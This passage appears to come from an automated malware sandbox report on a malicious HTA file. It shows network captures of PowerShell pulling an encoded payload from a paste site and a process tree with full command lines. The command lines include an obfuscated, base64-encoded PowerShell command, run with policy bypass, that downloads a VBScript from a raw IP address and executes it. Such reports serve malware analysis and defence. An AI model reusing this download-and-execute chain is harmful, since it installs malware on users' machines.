Ux+,NG)UeUefI"w-n2^2@%2idutDCH=$WsSw4]GI@~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk>BDoGJp+m+{
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49759	104.21.84.67	443	2704	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 10:23:29 UTC	67	OUT	GET /r/03xCn/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-12-11 10:23:29 UTC	1289	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:23:29 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: HIT Age: 101937 Last-Modified: Tue, 10 Dec 2024 06:04:32 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ca6ACL%2B2OtQ5nLyUAkTGZLmOBNt79sLTBy9XyY9kFYWhzbp49iAY%2B8jJxj1lIuZGttjeS2Ly8y9%2FA9FX3K7IK2E0vGDA8l%2F58LwxLBMIKfHie1IWA0ZB757iQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f04c2721b550f5b-EWR alt-svc: h3=":443"; ma=86400
2024-12-11 10:23:29 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 35 35 26 6d 69 6e 5f 72 74 74 3d 31 34 34 36 26 72 74 74 5f 76 61 72 3d 35 36 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 31 37 32 36 38 26 63 77 6e 64 3d 32 31 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 61 30 32 63 37 65 35 30 65 64 65 34 62 33 32 26 74 73 3d 34 35 30 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1455&min_rtt=1446&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1917268&cwnd=218&unsent_bytes=0&cid=ba02c7e50ede4b32&ts=450&x=0"
2024-12-11 10:23:29 UTC	1234	IN	Data Raw: 37 61 39 31 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a Data Ascii: 7a91AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 6b 67 44 46 33 77 2f 4e 30 66 44 38 33 77 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48 Data Ascii: kgDF3w/N0fD83w+NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wH
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e Data Ascii: rDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8N
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 44 34 31 67 64 4e 51 58 44 79 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f Data Ascii: D41gdNQXDy1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMo
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65 Data Ascii: Z6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIe
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 41 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 Data Ascii: AAwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAA
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a 31 Data Ascii: 01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj1
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 2b Data Ascii: xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA+
2024-12-11 10:23:29 UTC	1369	IN	Data Raw: 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b 34 Data Ascii: MJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+4

Target ID:	0
Start time:	05:22:55
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta"
Imagebase:	0x7f0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:22:56
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:22:56
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:22:56
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Imagebase:	0xa00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:22:58
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
Imagebase:	0x660000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:22:59
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"
Imagebase:	0x5b0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:23:05
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"
Imagebase:	0x170000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:23:05
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
